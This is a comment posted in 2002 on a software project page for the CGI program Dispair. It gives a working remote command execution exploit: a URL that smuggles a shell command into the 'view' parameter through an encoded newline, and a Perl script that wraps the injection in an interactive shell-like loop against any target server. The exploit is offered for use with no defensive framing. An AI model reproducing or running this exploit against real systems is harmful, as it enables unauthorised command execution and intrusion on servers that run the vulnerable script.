Projects / Dispair / Comments

Comments for Dispair

30 Jul 2002 16:47 404

remote command execution exploit
http://target/cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id

Here is a perl script that provides a shell-like interface:

#!/usr/bin/perl

use strict;
use IO::Socket;

my $target = shift || die "usage: $0 <targetserver>";
my $cmd = '';

while ($cmd ne 'exit') {
print ">> "; $cmd = <STDIN>; chomp $cmd;
$cmd =~ s/ /%20/g;
my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 'http(80)', Proto => 'tcp');
print $socket "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A$cmd HTTP/1.0\n";
print $socket "Host: $target\n";
print $socket "USER-AGENT: scriptkiddie\n\n";
while (<$socket>) { last if ($_ =~ m/^\r/); }
while (<$socket>) { print; }
close $socket;
}

Screenshot

Project Spotlight

ReciJournal

An open, cross-platform journaling program.

Screenshot

Project Spotlight

Veusz

A scientific plotting package.